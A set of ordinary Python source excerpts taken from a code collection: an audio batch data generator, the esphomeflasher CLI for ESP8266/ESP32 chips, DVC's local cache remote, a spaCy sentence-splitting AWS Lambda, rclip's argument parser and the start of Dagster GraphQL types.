batch_x = np.zeros(batch_shape, dtype=params.dtype)
# build batch of image data
for i, filename in enumerate(filenames):
class_id = classes[i]
if filename:
filepath = os.path.join(params.directory, filename)
x, orignal_sr = librosa.load(filepath, sr=None, mono=True, dtype='float32')
else:
orignal_sr = 16000
x = np.zeros((orignal_sr,), dtype='float32')
# At this point,
# x = [sample_length] dtype=float32
if params.noaug_preprocessing_function is not None:
kwargs = _add_optional_callback_arguments(
params.noaug_preprocessing_function,
batch_index=i,
class_id=class_id,
filename=filename,
batch_class_ids=classes,
batch_filenames=filenames
)
x = params.noaug_preprocessing_function(params, x, **kwargs)
if params.subset != 'validation' or params.audio_data_generator.validation_augmentation_enabled:
transform_params = params.audio_data_generator.get_random_transform()
else:
transform_params = params.audio_data_generator.default_transform
# Apply any audio augmentations
# NOTE: If transform_params = default_transform
# Then the audio sample is simply cropped/padded to fit the expected sample length
x = params.audio_data_generator.apply_transform(x, orignal_sr, transform_params)
if params.preprocessing_function is not None:
kwargs = _add_optional_callback_arguments(
params.preprocessing_function,
batch_index=i,
class_id=class_id,
filename=filename,
batch_class_ids=classes,
batch_filenames=filenames
)
x = params.preprocessing_function(params, x, **kwargs)
if params.frontend_enabled:
# If a frontend dtype was specified use that,
# otherwise just use the output dtype
frontend_dtype = params.frontend_dtype or params.dtype
# After point through the frontend,
# x = [height, width] dtype=frontend_dtype
x = params.audio_data_generator.apply_frontend(x, dtype=frontend_dtype)
# Perform any post processing as necessary
if params.postprocessing_function is not None:
kwargs = _add_optional_callback_arguments(
params.postprocessing_function,
batch_index=i,
class_id=class_id,
filename=filename,
batch_class_ids=classes,
batch_filenames=filenames
)
x = params.postprocessing_function(params, x, **kwargs)
if params.frontend_enabled:
# Do any standardizations (which are done using float32 internally)
x = params.audio_data_generator.standardize(x)
if params.add_channel_dimension:
# Convert the sample's shape from [height, width]
# to [height, width, 1]
x = np.expand_dims(x, axis=-1)
batch_x[i] = x
# build batch of labels
if params.class_mode == 'input':
batch_y = batch_x.copy()
elif params.class_mode in {'binary', 'sparse'}:
batch_y = np.empty(len(batch_x), dtype=params.dtype)
for i, class_id in enumerate(classes):
batch_y[i] = class_id
elif params.class_mode == 'categorical':
batch_y = np.zeros((len(batch_x), len(params.class_indices)), dtype=params.dtype)
for i, class_id in enumerate(classes):
batch_y[i, class_id] = 1.
else:
return batch_index, batch_x
return batch_index, (batch_x, batch_y)
class BatchData(object):
def __init__(self, n, shuffle, shutdown_event: threading.Event):
self.n = n
self.shuffle = shuffle
self.batch_data = queue.Queue() if shuffle else {}
self.batch_data_lock = threading.Condition()
self.indices_lock = threading.Condition()
self.indices = [i for i in range(self.n)]
self.requests = []
self.data_event = threading.Event()
self.shutdown_event = shutdown_event
@property
def have_more_indices(self):
with self.indices_lock:
return (len(self.indices) + len(self.requests)) > 0
@property
def request_count(self):
with self.indices_lock:
return len(self.requests)
def reset_indices(self):
with self.indices_lock:
self.indices = [i for i in range(self.n)]
def next_index(self):
with self.indices_lock:
if len(self.requests) > 0:
idx = self.requests.pop(0)
try:
self.indices.remove(idx)
except:
pass
return idx
else:
return self.indices.pop(0)
def wait(self):
self.data_event.clear()
while not self.shutdown_event.is_set():
if self.data_event.wait(timeout=.1):
return True
return False
def reset(self):
if self.shuffle:
while not self.batch_data.empty():
self.batch_data.get()
else:
with self.batch_data_lock:
self.batch_data.clear()
with self.indices_lock:
self.requests = []
self.indices = [i for i in range(self.n)]
def qsize(self):
if self.shuffle:
return self.batch_data.qsize()
else:
with self.batch_data_lock:
return len(self.batch_data)
def put(self, index, value):
if self.shuffle:
self.batch_data.put(value)
else:
with self.batch_data_lock:
self.batch_data[index] = value
self.batch_data_lock.notify_all()
def get(self, index):
if self.shuffle:
while True:
if self.shutdown_event.is_set():
return None
try:
retval = self.batch_data.get(timeout=0.1)
break
except queue.Empty:
continue
else:
with self.batch_data_lock:
if not index in self.batch_data:
with self.indices_lock:
self.requests.append(index)
self.data_event.set()
while index not in self.batch_data:
if self.shutdown_event.is_set():
return None
self.batch_data_lock.wait(timeout=0.1)
retval = self.batch_data[index]
del self.batch_data[index]
self.data_event.set()
return retval
def _add_optional_callback_arguments(
func,
batch_index,
class_id,
filename,
batch_class_ids,
batch_filenames
) -> dict:
retval = {}
args = inspect.getfullargspec(func).args
if 'batch_index' in args:
retval['batch_index'] = batch_index
if 'class_id' in args:
retval['class_id'] = class_id
if 'filename' in args:
retval['filename'] = filename
if 'batch_class_ids' in args:
retval['batch_class_ids'] = batch_class_ids
if 'batch_filenames' in args:
retval['batch_filenames'] = batch_filenames
return retval
|
the-stack_106_14798
|
from __future__ import print_function
import argparse
import sys
import time
from datetime import datetime
import esptool
import serial
from esphomeflasher import const
from esphomeflasher.common import (
ESP32ChipInfo,
EsphomeflasherError,
chip_run_stub,
configure_write_flash_args,
detect_chip,
detect_flash_size,
read_chip_info,
)
from esphomeflasher.const import (
ESP32_DEFAULT_BOOTLOADER_FORMAT,
ESP32_DEFAULT_OTA_DATA,
ESP32_DEFAULT_PARTITIONS,
)
from esphomeflasher.helpers import list_serial_ports
def parse_args(argv):
parser = argparse.ArgumentParser(prog=f"esphomeflasher {const.__version__}")
parser.add_argument("-p", "--port", help="Select the USB/COM port for uploading.")
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument("--esp8266", action="store_true")
group.add_argument("--esp32", action="store_true")
group.add_argument(
"--upload-baud-rate",
type=int,
default=460800,
help="Baud rate to upload with (not for logging)",
)
parser.add_argument(
"--bootloader",
help="(ESP32-only) The bootloader to flash.",
default=ESP32_DEFAULT_BOOTLOADER_FORMAT,
)
parser.add_argument(
"--partitions",
help="(ESP32-only) The partitions to flash.",
default=ESP32_DEFAULT_PARTITIONS,
)
parser.add_argument(
"--otadata",
help="(ESP32-only) The otadata file to flash.",
default=ESP32_DEFAULT_OTA_DATA,
)
parser.add_argument(
"--no-erase", help="Do not erase flash before flashing", action="store_true"
)
parser.add_argument("--show-logs", help="Only show logs", action="store_true")
parser.add_argument("binary", help="The binary image to flash.")
return parser.parse_args(argv[1:])
def select_port(args):
if args.port is not None:
print(f"Using '{args.port}' as serial port.")
return args.port
ports = list_serial_ports()
if not ports:
raise EsphomeflasherError("No serial port found!")
if len(ports) != 1:
print("Found more than one serial port:")
for port, desc in ports:
print(f" * {port} ({desc})")
print("Please choose one with the --port argument.")
raise EsphomeflasherError
print(f"Auto-detected serial port: {ports[0][0]}")
return ports[0][0]
def show_logs(serial_port):
print("Showing logs:")
with serial_port:
while True:
try:
raw = serial_port.readline()
except serial.SerialException:
print("Serial port closed!")
return
text = raw.decode(errors="ignore")
line = text.replace("\r", "").replace("\n", "")
time_ = datetime.now().time().strftime("[%H:%M:%S]")
message = time_ + line
try:
print(message)
except UnicodeEncodeError:
print(message.encode("ascii", "backslashreplace"))
def run_esphomeflasher(argv):
args = parse_args(argv)
port = select_port(args)
if args.show_logs:
serial_port = serial.Serial(port, baudrate=115200)
show_logs(serial_port)
return
try:
# pylint: disable=consider-using-with
firmware = open(args.binary, "rb")
except IOError as err:
raise EsphomeflasherError(f"Error opening binary: {err}") from err
chip = detect_chip(port, args.esp8266, args.esp32)
info = read_chip_info(chip)
print()
print("Chip Info:")
print(f" - Chip Family: {info.family}")
print(f" - Chip Model: {info.model}")
if isinstance(info, ESP32ChipInfo):
print(f" - Number of Cores: {info.num_cores}")
print(f" - Max CPU Frequency: {info.cpu_frequency}")
print(f" - Has Bluetooth: {'YES' if info.has_bluetooth else 'NO'}")
print(f" - Has Embedded Flash: {'YES' if info.has_embedded_flash else 'NO'}")
print(
f" - Has Factory-Calibrated ADC: {'YES' if info.has_factory_calibrated_adc else 'NO'}"
)
else:
print(f" - Chip ID: {info.chip_id:08X}")
print(f" - MAC Address: {info.mac}")
stub_chip = chip_run_stub(chip)
flash_size = None
if args.upload_baud_rate != 115200:
try:
stub_chip.change_baud(args.upload_baud_rate)
except esptool.FatalError as err:
raise EsphomeflasherError(
f"Error changing ESP upload baud rate: {err}"
) from err
# Check if the higher baud rate works
try:
flash_size = detect_flash_size(stub_chip)
except EsphomeflasherError:
# Go back to old baud rate by recreating chip instance
print(
f"Chip does not support baud rate {args.upload_baud_rate}, changing to 115200"
)
# pylint: disable=protected-access
stub_chip._port.close()
chip = detect_chip(port, args.esp8266, args.esp32)
stub_chip = chip_run_stub(chip)
if flash_size is None:
flash_size = detect_flash_size(stub_chip)
print(f" - Flash Size: {flash_size}")
mock_args = configure_write_flash_args(
info, firmware, flash_size, args.bootloader, args.partitions, args.otadata
)
print(f" - Flash Mode: {mock_args.flash_mode}")
print(f" - Flash Frequency: {mock_args.flash_freq.upper()}Hz")
try:
stub_chip.flash_set_parameters(esptool.flash_size_bytes(flash_size))
except esptool.FatalError as err:
raise EsphomeflasherError(f"Error setting flash parameters: {err}") from err
if not args.no_erase:
try:
esptool.erase_flash(stub_chip, mock_args)
except esptool.FatalError as err:
raise EsphomeflasherError(f"Error while erasing flash: {err}") from err
try:
esptool.write_flash(stub_chip, mock_args)
except esptool.FatalError as err:
raise EsphomeflasherError(f"Error while writing flash: {err}") from err
print("Hard Resetting...")
stub_chip.hard_reset()
print("Done! Flashing is complete!")
print()
if args.upload_baud_rate != 115200:
# pylint: disable=protected-access
stub_chip._port.baudrate = 115200
time.sleep(0.05) # get rid of crap sent during baud rate change
# pylint: disable=protected-access
stub_chip._port.flushInput()
# pylint: disable=protected-access
show_logs(stub_chip._port)
def main():
try:
if len(sys.argv) <= 1:
from esphomeflasher import gui
return gui.main() or 0
return run_esphomeflasher(sys.argv) or 0
except EsphomeflasherError as err:
msg = str(err)
if msg:
print(msg)
return 1
except KeyboardInterrupt:
return 1
if __name__ == "__main__":
sys.exit(main())
|
the-stack_106_14800
|
from __future__ import unicode_literals
from copy import copy
from dvc.utils.compat import str, makedirs
import os
import stat
import uuid
import json
import ntpath
import shutil
import posixpath
import logging
from operator import itemgetter
from dvc.system import System
from dvc.remote.base import (
RemoteBase,
STATUS_MAP,
STATUS_NEW,
STATUS_DELETED,
STATUS_MISSING,
)
from dvc.utils import (
remove,
move,
copyfile,
dict_md5,
to_chunks,
tmp_fname,
walk_files,
)
from dvc.utils import LARGE_DIR_SIZE
from dvc.config import Config
from dvc.exceptions import DvcException
from dvc.progress import progress
from concurrent.futures import ThreadPoolExecutor
from dvc.utils.fs import get_mtime_and_size, get_inode
logger = logging.getLogger(__name__)
class RemoteLOCAL(RemoteBase):
scheme = "local"
REGEX = r"^(?P<path>.*)$"
PARAM_CHECKSUM = "md5"
PARAM_PATH = "path"
PARAM_RELPATH = "relpath"
MD5_DIR_SUFFIX = ".dir"
DEFAULT_CACHE_TYPES = ["reflink", "copy"]
CACHE_TYPE_MAP = {
"copy": shutil.copyfile,
"symlink": System.symlink,
"hardlink": System.hardlink,
"reflink": System.reflink,
}
def __init__(self, repo, config):
super(RemoteLOCAL, self).__init__(repo, config)
self.state = self.repo.state if self.repo else None
self.protected = config.get(Config.SECTION_CACHE_PROTECTED, False)
storagepath = config.get(Config.SECTION_AWS_STORAGEPATH, None)
self.cache_dir = config.get(Config.SECTION_REMOTE_URL, storagepath)
if self.cache_dir is not None and not os.path.isabs(self.cache_dir):
cwd = config[Config.PRIVATE_CWD]
self.cache_dir = os.path.abspath(os.path.join(cwd, self.cache_dir))
types = config.get(Config.SECTION_CACHE_TYPE, None)
if types:
if isinstance(types, str):
types = [t.strip() for t in types.split(",")]
self.cache_types = types
else:
self.cache_types = copy(self.DEFAULT_CACHE_TYPES)
if self.cache_dir is not None and not os.path.exists(self.cache_dir):
os.mkdir(self.cache_dir)
self.path_info = {"scheme": "local"}
self._dir_info = {}
@staticmethod
def compat_config(config):
ret = config.copy()
url = ret.pop(Config.SECTION_AWS_STORAGEPATH, "")
ret[Config.SECTION_REMOTE_URL] = url
return ret
@property
def url(self):
return self.cache_dir
@property
def prefix(self):
return self.cache_dir
def list_cache_paths(self):
clist = []
for entry in os.listdir(self.cache_dir):
subdir = os.path.join(self.cache_dir, entry)
if not os.path.isdir(subdir):
continue
for cache in os.listdir(subdir):
clist.append(os.path.join(subdir, cache))
return clist
def get(self, md5):
if not md5:
return None
return os.path.join(self.cache_dir, md5[0:2], md5[2:])
def changed_cache_file(self, md5):
cache = self.get(md5)
if self.state.changed(cache, md5=md5):
if os.path.exists(cache):
msg = "Corrupted cache file {}."
logger.warning(msg.format(os.path.relpath(cache)))
remove(cache)
return True
return False
def exists(self, path_info):
assert not isinstance(path_info, list)
assert path_info["scheme"] == "local"
return os.path.lexists(path_info["path"])
def changed_cache(self, md5):
cache = self.get(md5)
clist = [(cache, md5)]
while True:
if len(clist) == 0:
break
cache, md5 = clist.pop()
if self.changed_cache_file(md5):
return True
if self.is_dir_cache(cache) and self._cache_metadata_changed():
for entry in self.load_dir_cache(md5):
md5 = entry[self.PARAM_CHECKSUM]
cache = self.get(md5)
clist.append((cache, md5))
return False
def link(self, cache, path):
assert os.path.isfile(cache)
dname = os.path.dirname(path)
if not os.path.exists(dname):
os.makedirs(dname)
# NOTE: just create an empty file for an empty cache
if os.path.getsize(cache) == 0:
open(path, "w+").close()
msg = "Created empty file: {} -> {}".format(cache, path)
logger.debug(msg)
return
i = len(self.cache_types)
while i > 0:
try:
self.CACHE_TYPE_MAP[self.cache_types[0]](cache, path)
if self.protected:
os.chmod(path, stat.S_IREAD | stat.S_IRGRP | stat.S_IROTH)
msg = "Created {}'{}': {} -> {}".format(
"protected " if self.protected else "",
self.cache_types[0],
cache,
path,
)
logger.debug(msg)
return
except DvcException as exc:
msg = "Cache type '{}' is not supported: {}"
logger.debug(msg.format(self.cache_types[0], str(exc)))
del self.cache_types[0]
i -= 1
raise DvcException("no possible cache types left to try out.")
@property
def ospath(self):
if os.name == "nt":
return ntpath
return posixpath
@classmethod
def to_ospath(cls, path):
if os.name == "nt":
return cls.ntpath(path)
return cls.unixpath(path)
@staticmethod
def unixpath(path):
assert not ntpath.isabs(path)
assert not posixpath.isabs(path)
return path.replace("\\", "/")
@staticmethod
def ntpath(path):
assert not ntpath.isabs(path)
assert not posixpath.isabs(path)
return path.replace("/", "\\")
def collect_dir_cache(self, dname):
dir_info = []
for root, dirs, files in os.walk(str(dname)):
bar = False
if len(files) > LARGE_DIR_SIZE:
msg = (
"Computing md5 for a large directory {}. "
"This is only done once."
)
logger.info(msg.format(os.path.relpath(root)))
bar = True
title = os.path.relpath(root)
processed = 0
total = len(files)
progress.update_target(title, 0, total)
for fname in files:
path = os.path.join(root, fname)
relpath = self.unixpath(os.path.relpath(path, dname))
if bar:
progress.update_target(title, processed, total)
processed += 1
md5 = self.state.update(path)
dir_info.append(
{self.PARAM_RELPATH: relpath, self.PARAM_CHECKSUM: md5}
)
if bar:
progress.finish_target(title)
# NOTE: sorting the list by path to ensure reproducibility
dir_info = sorted(dir_info, key=itemgetter(self.PARAM_RELPATH))
md5 = dict_md5(dir_info) + self.MD5_DIR_SUFFIX
if self.changed_cache_file(md5):
self.dump_dir_cache(md5, dir_info)
return (md5, dir_info)
def load_dir_cache(self, md5):
path = self.get(md5)
assert self.is_dir_cache(path)
dir_info = self._dir_info.get(md5)
if dir_info:
return dir_info
try:
with open(path, "r") as fd:
d = json.load(fd)
except Exception:
msg = "Failed to load dir cache '{}'"
logger.exception(msg.format(os.path.relpath(path)))
return []
if not isinstance(d, list):
msg = "dir cache file format error '{}' [skipping the file]"
logger.error(msg.format(os.path.relpath(path)))
return []
for info in d:
info["relpath"] = self.to_ospath(info["relpath"])
self._dir_info[md5] = d
return d
def dump_dir_cache(self, md5, dir_info):
path = self.get(md5)
dname = os.path.dirname(path)
assert self.is_dir_cache(path)
assert isinstance(dir_info, list)
if not os.path.isdir(dname):
os.makedirs(dname)
# NOTE: Writing first and renaming after that
# to make sure that the operation is atomic.
tmp = "{}.{}".format(path, str(uuid.uuid4()))
with open(tmp, "w+") as fd:
json.dump(dir_info, fd, sort_keys=True)
move(tmp, path)
@classmethod
def is_dir_cache(cls, cache):
return cache.endswith(cls.MD5_DIR_SUFFIX)
def do_checkout(
self, path_info, checksum, force=False, progress_callback=None
):
path = path_info["path"]
cache = self.get(checksum)
if not self.is_dir_cache(cache):
if self.exists(path_info):
self.safe_remove(path_info, force=force)
self.link(cache, path)
self.state.update_link(path)
if progress_callback:
progress_callback.update(os.path.relpath(path))
return
# Create dir separately so that dir is created
# even if there are no files in it
if not os.path.exists(path):
os.makedirs(path)
dir_relpath = os.path.relpath(path)
logger.debug("Linking directory '{}'.".format(dir_relpath))
dir_info = self.load_dir_cache(checksum)
for processed, entry in enumerate(dir_info):
relpath = entry[self.PARAM_RELPATH]
m = entry[self.PARAM_CHECKSUM]
p = os.path.join(path, relpath)
c = self.get(m)
entry_info = {"scheme": path_info["scheme"], self.PARAM_PATH: p}
entry_checksum_info = {self.PARAM_CHECKSUM: m}
if self.changed(entry_info, entry_checksum_info):
if self.exists(entry_info):
self.safe_remove(entry_info, force=force)
self.link(c, p)
if progress_callback:
progress_callback.update(os.path.relpath(p))
self._discard_working_directory_changes(path, dir_info, force=force)
self.state.update_link(path)
def already_cached(self, path_info):
assert path_info["scheme"] in ["", "local"]
current_md5 = self.state.update(path_info["path"])
if not current_md5:
return False
return not self.changed_cache(current_md5)
def _discard_working_directory_changes(self, path, dir_info, force=False):
working_dir_files = set(path for path in walk_files(path))
cached_files = set(
os.path.join(path, file["relpath"]) for file in dir_info
)
delta = working_dir_files - cached_files
for file in delta:
self.safe_remove({"scheme": "local", "path": file}, force=force)
def _move(self, inp, outp):
# moving in two stages to make the whole operation atomic in
# case inp and outp are in different filesystems and actual
# physical copying of data is happening
tmp = "{}.{}".format(outp, str(uuid.uuid4()))
move(inp, tmp)
move(tmp, outp)
def _save_file(self, path, md5):
assert md5 is not None
cache = self.get(md5)
if self.changed_cache(md5):
self._move(path, cache)
else:
remove(path)
self.link(cache, path)
self.state.update_link(path)
# we need to update path and cache, since in case of reflink,
# or copy cache type moving original file results in updates on
# next executed command, which causes md5 recalculation
self.state.update(path, md5)
self.state.update(cache, md5)
return {self.PARAM_CHECKSUM: md5}
def _save_dir(self, path, md5):
dir_info = self.load_dir_cache(md5)
dir_relpath = os.path.relpath(path)
dir_size = len(dir_info)
bar = dir_size > LARGE_DIR_SIZE
logger.info("Linking directory '{}'.".format(dir_relpath))
for processed, entry in enumerate(dir_info):
relpath = entry[self.PARAM_RELPATH]
m = entry[self.PARAM_CHECKSUM]
p = os.path.join(path, relpath)
c = self.get(m)
if self.changed_cache(m):
self._move(p, c)
else:
remove(p)
self.link(c, p)
self.state.update(p, m)
self.state.update(c, m)
if bar:
progress.update_target(dir_relpath, processed, dir_size)
self.state.update_link(path)
cache = self.get(md5)
self.state.update(cache)
self.state.update(path, md5)
if bar:
progress.finish_target(dir_relpath)
def save(self, path_info, checksum_info):
if path_info["scheme"] != "local":
raise NotImplementedError
path = path_info["path"]
msg = "Saving '{}' to cache '{}'."
logger.info(
msg.format(os.path.relpath(path), os.path.relpath(self.cache_dir))
)
md5 = checksum_info[self.PARAM_CHECKSUM]
if os.path.isdir(path):
self._save_dir(path, md5)
else:
self._save_file(path, md5)
def save_info(self, path_info):
if path_info["scheme"] != "local":
raise NotImplementedError
return {self.PARAM_CHECKSUM: self.state.update(path_info["path"])}
def remove(self, path_info):
if path_info["scheme"] != "local":
raise NotImplementedError
remove(path_info["path"])
def move(self, from_info, to_info):
if from_info["scheme"] != "local" or to_info["scheme"] != "local":
raise NotImplementedError
move(from_info["path"], to_info["path"])
def cache_exists(self, md5s):
assert isinstance(md5s, list)
return list(filter(lambda md5: not self.changed_cache_file(md5), md5s))
def upload(self, from_infos, to_infos, names=None):
names = self._verify_path_args(to_infos, from_infos, names)
for from_info, to_info, name in zip(from_infos, to_infos, names):
if to_info["scheme"] != "local":
raise NotImplementedError
if from_info["scheme"] != "local":
raise NotImplementedError
logger.debug(
"Uploading '{}' to '{}'".format(
from_info["path"], to_info["path"]
)
)
if not name:
name = os.path.basename(from_info["path"])
makedirs(os.path.dirname(to_info["path"]), exist_ok=True)
tmp_file = tmp_fname(to_info["path"])
try:
copyfile(from_info["path"], tmp_file, name=name)
os.rename(tmp_file, to_info["path"])
except Exception:
logger.exception(
"failed to upload '{}' to '{}'".format(
from_info["path"], to_info["path"]
)
)
def download(
self,
from_infos,
to_infos,
no_progress_bar=False,
names=None,
resume=False,
):
names = self._verify_path_args(from_infos, to_infos, names)
for to_info, from_info, name in zip(to_infos, from_infos, names):
if from_info["scheme"] != "local":
raise NotImplementedError
if to_info["scheme"] != "local":
raise NotImplementedError
logger.debug(
"Downloading '{}' to '{}'".format(
from_info["path"], to_info["path"]
)
)
if not name:
name = os.path.basename(to_info["path"])
makedirs(os.path.dirname(to_info["path"]), exist_ok=True)
tmp_file = tmp_fname(to_info["path"])
try:
copyfile(
from_info["path"],
tmp_file,
no_progress_bar=no_progress_bar,
name=name,
)
move(tmp_file, to_info["path"])
except Exception:
logger.exception(
"failed to download '{}' to '{}'".format(
from_info["path"], to_info["path"]
)
)
continue
def _group(self, checksum_infos, show_checksums=False):
by_md5 = {}
for info in checksum_infos:
md5 = info[self.PARAM_CHECKSUM]
if show_checksums:
by_md5[md5] = {"name": md5}
continue
name = info[self.PARAM_PATH]
branch = info.get("branch")
if branch:
name += "({})".format(branch)
if md5 not in by_md5.keys():
by_md5[md5] = {"name": name}
else:
by_md5[md5]["name"] += " " + name
return by_md5
def status(self, checksum_infos, remote, jobs=None, show_checksums=False):
logger.info("Preparing to collect status from {}".format(remote.url))
title = "Collecting information"
ret = {}
progress.set_n_total(1)
progress.update_target(title, 0, 100)
progress.update_target(title, 10, 100)
ret = self._group(checksum_infos, show_checksums=show_checksums)
md5s = list(ret.keys())
progress.update_target(title, 30, 100)
remote_exists = list(remote.cache_exists(md5s))
progress.update_target(title, 90, 100)
local_exists = self.cache_exists(md5s)
progress.finish_target(title)
self._fill_statuses(ret, local_exists, remote_exists)
self._log_missing_caches(ret)
return ret
def _fill_statuses(self, checksum_info_dir, local_exists, remote_exists):
for md5, info in checksum_info_dir.items():
status = STATUS_MAP[(md5 in local_exists, md5 in remote_exists)]
info["status"] = status
def _get_chunks(self, download, remote, status_info, status, jobs):
title = "Analysing status."
progress.set_n_total(1)
total = len(status_info)
current = 0
cache = []
path_infos = []
names = []
for md5, info in status_info.items():
if info["status"] == status:
cache.append(self.checksum_to_path_info(md5))
path_infos.append(remote.checksum_to_path_info(md5))
names.append(info["name"])
current += 1
progress.update_target(title, current, total)
progress.finish_target(title)
progress.set_n_total(len(names))
if download:
to_infos = cache
from_infos = path_infos
else:
to_infos = path_infos
from_infos = cache
return list(
zip(
to_chunks(from_infos, jobs),
to_chunks(to_infos, jobs),
to_chunks(names, jobs),
)
)
def _process(
self,
checksum_infos,
remote,
jobs=None,
show_checksums=False,
download=False,
):
msg = "Preparing to {} data {} '{}'"
logger.info(
msg.format(
"download" if download else "upload",
"from" if download else "to",
remote.url,
)
)
if download:
func = remote.download
status = STATUS_DELETED
else:
func = remote.upload
status = STATUS_NEW
if jobs is None:
jobs = remote.JOBS
status_info = self.status(
checksum_infos, remote, jobs=jobs, show_checksums=show_checksums
)
chunks = self._get_chunks(download, remote, status_info, status, jobs)
if len(chunks) == 0:
return 0
futures = []
with ThreadPoolExecutor(max_workers=jobs) as executor:
for from_infos, to_infos, names in chunks:
res = executor.submit(func, from_infos, to_infos, names=names)
futures.append(res)
for f in futures:
f.result()
return len(chunks)
def push(self, checksum_infos, remote, jobs=None, show_checksums=False):
return self._process(
checksum_infos,
remote,
jobs=jobs,
show_checksums=show_checksums,
download=False,
)
def pull(self, checksum_infos, remote, jobs=None, show_checksums=False):
return self._process(
checksum_infos,
remote,
jobs=jobs,
show_checksums=show_checksums,
download=True,
)
def _cache_metadata_changed(self):
mtime, size = get_mtime_and_size(self.cache_dir)
inode = get_inode(self.cache_dir)
existing_record = self.state.get_state_record_for_inode(inode)
if existing_record:
cached_mtime, cached_size, _, _ = existing_record
return not (mtime == cached_mtime and size == cached_size)
return True
def _log_missing_caches(self, checksum_info_dict):
missing_caches = [
(md5, info)
for md5, info in checksum_info_dict.items()
if info["status"] == STATUS_MISSING
]
if missing_caches:
missing_desc = "".join(
[
"\nname: {}, md5: {}".format(info["name"], md5)
for md5, info in missing_caches
]
)
msg = (
"Some of the cache files do not exist neither locally "
"nor on remote. Missing cache files: {}".format(missing_desc)
)
logger.warning(msg)
@staticmethod
def _unprotect_file(path):
if System.is_symlink(path) or System.is_hardlink(path):
logger.debug("Unprotecting '{}'".format(path))
tmp = os.path.join(os.path.dirname(path), "." + str(uuid.uuid4()))
# The operations order is important here - if some application
# would access the file during the process of copyfile then it
# would get only the part of file. So, at first, the file should be
# copied with the temporary name, and then original file should be
# replaced by new.
copyfile(
path,
tmp,
name="Unprotecting '{}'".format(os.path.relpath(path)),
)
remove(path)
os.rename(tmp, path)
else:
logger.debug(
"Skipping copying for '{}', since it is not "
"a symlink or a hardlink.".format(path)
)
os.chmod(path, os.stat(path).st_mode | stat.S_IWRITE)
@staticmethod
def _unprotect_dir(path):
for path in walk_files(path):
RemoteLOCAL._unprotect_file(path)
@staticmethod
def unprotect(path_info):
path = path_info["path"]
if not os.path.exists(path):
raise DvcException(
"can't unprotect non-existing data '{}'".format(path)
)
if os.path.isdir(path):
RemoteLOCAL._unprotect_dir(path)
else:
RemoteLOCAL._unprotect_file(path)
|
the-stack_106_14804
|
import json
import os
import spacy
from helper import S3Helper
from update_event import update_event, get_new_s3_url
def get_file_content(aws_env: dict):
name_path_s3, _ = os.path.splitext(aws_env["objectName"])
txt_path_s3 = name_path_s3 + ".txt"
return S3Helper.readFromS3(aws_env['bucketName'], txt_path_s3,
aws_env['awsRegion'])
def spacy_sentences_extraction(content: str, aws_env: dict):
excluded_pipeline = ["tagger", "ner", "textcat", "parser"]
model_path = "/opt/python/xx_ent_wiki_sm/xx_ent_wiki_sm-2.3.0"
sentence_content = ""
if os.path.isdir(model_path) is False:
model_path = "xx_ent_wiki_sm"
nlp = spacy.load(model_path, disable=excluded_pipeline)
nlp.add_pipe(nlp.create_pipe('sentencizer'))
doc = nlp(content)
print("Pipelines names: ", nlp.pipe_names)
for sent in doc.sents:
sentence = sent.text.replace('\n', ' ')
sentence_content += "{}\n".format(sentence.strip())
S3Helper.writeToS3(sentence_content, aws_env['outputBucket'],
aws_env['outputNameTxt'], aws_env['awsRegion'])
def get_s3_path(path_s3_txt: str) -> str:
folder_output, pdf_output = os.path.split(path_s3_txt)
file_name, ext = os.path.splitext(pdf_output)
txt_file = "sentences_of_{}.txt".format(file_name)
txt_output = os.path.join(folder_output, txt_file)
return txt_output
def lambda_handler(event, context):
print("==> Event: {0}".format(json.dumps(event)))
aws_env = {
**event,
"bucketName": os.environ['DOCUMENTS_BUCKET'],
"awsRegion": 'eu-west-1',
"tmpOutput": "/tmp/tmp_sentences.txt",
"outputBucket": os.environ['DOCUMENTS_BUCKET'],
"outputNameTxt": get_s3_path(event['objectName']),
}
content = get_file_content(aws_env)
if content is None:
aws_env['status'] = -1
aws_env['errorMessage'] =\
"File {0} not found in s3 {1}".format(aws_env['objectName'],
aws_env['bucketName'])
return update_event(aws_env, event)
spacy_sentences_extraction(content, aws_env)
print("==> Aws env: {0}".format(json.dumps(aws_env)))
aws_env['status'] = 0
aws_env['errorMessage'] = None
aws_env["s3Url"] = get_new_s3_url(aws_env['s3Url'], "txt", aws_env['outputNameTxt'])
aws_env["contentType"] = "text/txt"
aws_env['objectName'] = aws_env['outputNameTxt']
print("====> NEW PATH: ", aws_env['objectName'])
aws_env["sourceUrl"] = aws_env["s3Url"]
return update_event(aws_env, event)
|
the-stack_106_14805
|
import argparse
import os
import pathlib
import sys
from rclip import config
def get_system_datadir() -> pathlib.Path:
"""
Returns a parent directory path
where persistent application data can be stored.
# linux: ~/.local/share
# macOS: ~/Library/Application Support
# windows: C:/Users/<USER>/AppData/Roaming
"""
home = pathlib.Path.home()
if sys.platform == "win32":
return home / "AppData/Roaming"
elif sys.platform.startswith("linux"):
return home / ".local/share"
elif sys.platform == "darwin":
return home / "Library/Application Support"
raise NotImplementedError(f"'{sys.platform}' is not supported")
def get_app_datadir() -> pathlib.Path:
app_datadir = os.getenv("DATADIR")
if app_datadir:
app_datapath = pathlib.Path(app_datadir)
else:
app_datapath = get_system_datadir() / config.NAME
os.makedirs(app_datapath, exist_ok=True)
return app_datapath
def top_arg_type(arg: str) -> int:
arg_int = int(arg)
if arg_int < 1:
raise argparse.ArgumentTypeError("number of results to display should be >0")
return arg_int
def init_arg_parser() -> argparse.ArgumentParser:
parser = argparse.ArgumentParser()
parser.add_argument("search_dir", help="Directory to search")
parser.add_argument("query")
parser.add_argument("--top", "-t", type=top_arg_type, default=10, help="number of top results to display")
parser.add_argument("--filepath-only", "-f", action="store_true", default=False, help="outputs only filepaths")
parser.add_argument(
"--skip-index", "-n",
action="store_true",
default=False,
help="don't attempt image indexing, saves time on consecutive runs on huge directories",
)
parser.add_argument(
"--exclude-dir",
action="append",
help="dir to exclude from search, can be specified multiple times;"
" adding this argument overrides the default of ('@eaDir', 'node_modules', '.git');"
" WARNING: the default will be removed in v2",
)
return parser
|
the-stack_106_14806
|
import graphene
from dagster import check
from dagster.core.execution.backfill import BulkActionStatus, PartitionBackfill
from dagster.core.storage.pipeline_run import PipelineRunsFilter
from .errors import (
GrapheneInvalidOutputError,
GrapheneInvalidStepError,
GraphenePartitionSetNotFoundError,
GraphenePipelineNotFoundError,
GraphenePythonError,
GrapheneRunConflict,
GrapheneUnauthorizedError,
create_execution_params_error_types,
)
from .pipelines.config import GrapheneRunConfigValidationInvalid
from .util import non_null_list
pipeline_execution_error_types = (
GrapheneInvalidStepError,
